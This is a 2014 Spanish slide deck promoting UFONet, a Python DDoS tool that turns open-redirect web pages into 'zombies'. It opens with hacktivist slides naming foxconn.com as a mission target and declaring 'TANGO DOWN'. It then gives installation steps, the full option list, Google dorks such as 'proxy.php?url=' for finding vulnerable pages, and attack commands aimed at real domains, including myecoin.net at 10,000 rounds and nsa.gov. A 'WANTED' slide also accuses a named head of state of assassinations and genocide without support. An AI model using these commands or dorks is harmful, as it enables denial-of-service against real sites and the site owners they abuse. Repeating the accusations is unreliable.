===============================================
UFONet
Ataques DDoS vía Web Abuse
2013/2014
por psy
===============================================
http://ufonet.sf.net
Edición: GSICKMINDS – 2014
===============================================
WARNING !!!!
WARNING !!!!
Nombre: Coltán
Composición:
-Columbita; FeMn+Nb2O6 (óxido de niobio)
-Tantalita; FeMn+Ta2 (óxido de tántalo)
Relevancia: Condensador electrolítico
Uso: Telefonía móvil, computadoras, implantes médicos, armamento...
Problemática:
- Congo → 82% reserva mundial (Grandes Lagos).
- Prolifera entre uranio, torio y radio (radioactividad).
- Consideración: recurso energético no renovable, estratégico.
- Guerra: Desde 1998. Apróx 5,7 Millones de víctimas.
* Ejército Patriótico Ruandés → Ruanda → Occidente.
* Occidente condona deuda Ruanda + crédito FMI y Banco Central.
- Precio: 1Tn = 400.000$ | 18 meses → 250.000M$
- Salario: Media Congo → 8€/m | Minero: 42€/m
===============================================
Edición: GSICKMINDS – 2014
===============================================
WANTED:
WANTED:
ID: Paul Kagame (23/10/1957)
Cargo: Presidente de Ruanda
CV:
- Fundador Frente Patriótico Ruandés
- Jefe de inteligencia militar: ERN
- Entrenamiento: Fort Leavenworth(USA)
Crímenes:
- Órden asesinato: Juvénal Habyarimana(Ruanda)
- Órden asesinato: Cyprien Ntaryamira(Burundi)
- Dirigir genocidio desde 1994
Prodecimiento:
25/09/2003: Recibe inmunidad diplomática
14/11/2003: Carla Del Ponte(SUI), fiscal TIDH -> destituída
21/01/2005: Stephen Rapp(USA), fiscal de OBAMA → toma el cargo
06/02/2008: Proceso abierto por crímenes contra la humanidad(pdf)
30/10/2014: En libertad
===============================================
Edición: GSICKMINDS – 2014
===============================================
MISIÓN: → foxconn.com
foxconn.com
MISIÓN: →
RealNick: Hon Hai Precision Industry Co.(TAI)
Dueño: Terry Guo aka Gou Tai-ming
Información:
Mayor productor mundial de aparatos electrónicos
Contratos:
*BlackBerry *iPad, *iPhone, *Kindle, *Playstation4
*Xbox One, *Wii U
Clientes:
Acer Inc.(TAI)
Amazon.com(USA)
Apple Inc.(USA)
BlackBerry Ltd.(CAN)
Cisco(USA)
Dell(USA)
Google(USA)
Hewlett-Packard(USA)
Microsoft(USA)
Motorola Mobility(USA)
Nintendo(JPN)
Nokia(FIN)
Sony(JPN)
Toshiba(JPN)
Vizio(USA)
===============================================
Edición: GSICKMINDS – 2014
===============================================
STATUS:
STATUS:
===============================================
TANGO DOWN ! ;-)
===============================================
UFONet
Ataques DDoS vía Web Abuse
2013/2014
por psy
===============================================
http://ufonet.sf.net
Versión actual (05/10/2014): v0.3.1b - Abduction
===============================================
* Qué es UFONet?
* Cómo funciona?
* Instalación
* Características
* Ejemplos de uso
* Ataque Simulado
* Siguiente versión
* Cómo contribuir?
===============================================
'Top 10' riesgos en aplicaciones: OWASP 2013
/Qué es UFONet?/
===============================================
+ Herramienta automática para lanzar ataques DDoS
+ Escrita en python / GPL v3.0
+ Primera versión:
- Nacida como modulo de XSSer (2009)
- Lanzada: v0.1b → 2013
+ Explota la Capa 7 (HTTP/Web Abuse)
- Vectores “Open Redirect”
OWASP: Top 10 2013-A10-Unvalidated Redirects and Forwards
+ Objetivo → Agotamiento de recursos (DoS)
===============================================
/Cómo funciona?/
===============================================
Vídeo (v0.1b): UFONet PoC
+ CWE-601: URL Redirection to Untrusted Site
Una aplicación web acepta una entrada controlada
por el usuario, que especifica un enlace a
un sitio web externo y éste, utiliza ese enlace
para una redirección.
+ OWASP: URL Redirector Abuse
Una aplicación acepta URLs arbitrarias definidas
por el usuario, que luego se utilizan como
objetivos para la redirección. Los usuarios pueden
ser reconducidos, sin saberlo, a un sitio malicioso
desde otro de confianza.
Ej: Ataques de Phising
===============================================
/Cómo funciona?/
===============================================
Vídeo (v0.3b/DE): DDoS-Angriff über Validatoren
===============================================
/Instalación/
===============================================
Código: git clone https://github.com/epsylon/ufonet
UFONet funciona en diferentes plataformas.
- GNU/Linux / Win32 / OSX …
Requiere:
- Python (~2.7.x)
- python-pycurl - Python bindings to libcurl
En sistemas basados en Debian (ej: Ubuntu):
~$ sudo apt-get install python-pycurl
===============================================
/Características/
===============================================
Ver comandos: $ ufonet -h / --help
+ Modularidad:
- Código escrito desde 0 (Limpio)
+ Proxy: (ej: Tor)
- Maestro → Proxy → Proxy(Zombie) → Objetivo
+ Spoofing: (Cabeceras HTTP)
- User-Agent/Referer/Host/X-Forwarded-For/...
+ Controlador de la Botnet:
- Buscar 'zombies' en Internet
- Probar las vulnerabilidades (Open Redirect)
+ Impacto: Petición(es) / Evadir cache en objetivo/...
===============================================
/Características/
===============================================
Primera versión: 18.06.2013
--version show program's version number and exit
-v, --verbose active verbose on requests
--check-tor check to see if Tor is used properly
--update check for latest stable version
*Configure Request(s)*:
--proxy=PROXY Use proxy server (tor: http://localhost:8118)
--user-agent=AGENT Use another HTTP User-Agent header (default SPOOFED)
--referer=REFERER Use another HTTP Referer header (default SPOOFED)
--host=HOST Use another HTTP Host header (default NONE)
--xforw Set your HTTP X-Forwarded-For with random IP values
--xclient Set your HTTP X-Client-IP with random IP values
--timeout=TIMEOUT Select your timeout (default 30)
--retries=RETRIES Retries when the connection timeouts (default 1)
--delay=DELAY Delay in seconds between each HTTP request (default 0)
*Manage Botnet*:
-s SEARCH Search 'zombies' on google (ex: -s 'proxy.php?url=')
--sn=NUM_RESULTS Set max number of result to search (default 10)
-t TEST Test list of web 'zombie' servers (ex: -t zombies.txt)
*Configure Attack(s)*:
-r ROUNDS Set number of 'rounds' for the attack (default: 1)
-b PLACE Set a place to 'bit' on target (ex: -b /path/big.jpg)
-a TARGET Start a Web DDoS attack (ex: -a http(s)://target.com)
===============================================
/Ejemplos de uso/
===============================================
Regalo zombie: pastebin
+ Búsqueda de 'zombies'
UFONet buscará en los resultados de google
1- Buscar resultados:
Ej: ./ufonet -s 'proxy.php?url=' --sn '100'
'checklink?uri='
'validator?uri='
2- Probar validez:
Wanna check if they are valid zombies? (Y/n)
3- Actualizar lista:
Wanna update your list (Y/n)
===============================================
/Ejemplos de uso/
===============================================
Documentación: README
+ Probar la botnet
UFONet probará las vulnerabilidades 'Open Redirect'
http://target.com/check?uri=<PAYLOAD>
Ej: ./ufonet -t zombies.txt
1- ¿Están vivos?:
HTTP HEAD Check:
- Desde maestro: RECUERDA -> PROXY!!!
- Desde fuera: downforeveryoneorjustme
2- Actualizar lista:
Wanna update your list (Y/n)
===============================================
/Ejemplos de uso/
===============================================
Mayor ataque probado: 3439 zombies
+ Atacando un objetivo
UFONet conducirá los zombies hasta el objetivo
+ Número de rondas por zombie
Ej: -r 10 / -r 10000
+ Lugar para “morder” (Ej: Película Flash, ...)
Ej: -b "/images/big_size_image.jpg"
-------------------------------------------------------
./ufonet -a http://target.com
* Round: Is target up?
Your target looks ONLINE!. Wanna start a DDoS attack? (y/N)
===============================================
/Ataque Simulado/
===============================================
All my zombies are belong to you ;-)
+ Desde maestro:
./ufonet –-check-tor
===============================================
/Ataque Simulado/
===============================================
All my zombies are belong to you ;-)
./ufonet –t zombies.txt
===============================================
/Ataque Simulado/
===============================================
All my zombies are belong to you ;-)
./ufonet -a http://myecoin.net -r 10000
===============================================
/Ataque Simulado/
===============================================
It's not just you! http://nsa.gov looks down from here
+ Desde objetivo:
===============================================
/Siguiente versión/
===============================================
Irc.freenode.net / #ufonet
+ Nombre: UFONEt v0.4b: Infection!
* Ideas:
- POST
- XML
- Anti-IDS/NIDS
- XSS/CSRF
- Multithreading
- HTTP Headers (rfc4229)
- GUI/GTK+
- Geomapping
- Impacto visual
- Estadísticas/Informes
- [...]
===============================================
/Cómo contribuir?/
===============================================
Autor:
[email protected] <> @psytzsche
+ Desarrollo:
- Testeo
- Documentación
- Corrección de errores / Hacking ;-)
- Propuestas/Ideas/Nuevas caract
Comentarios de: UFONet v0.3 Ataques DDoS vía Web Abuse (0)
No hay comentarios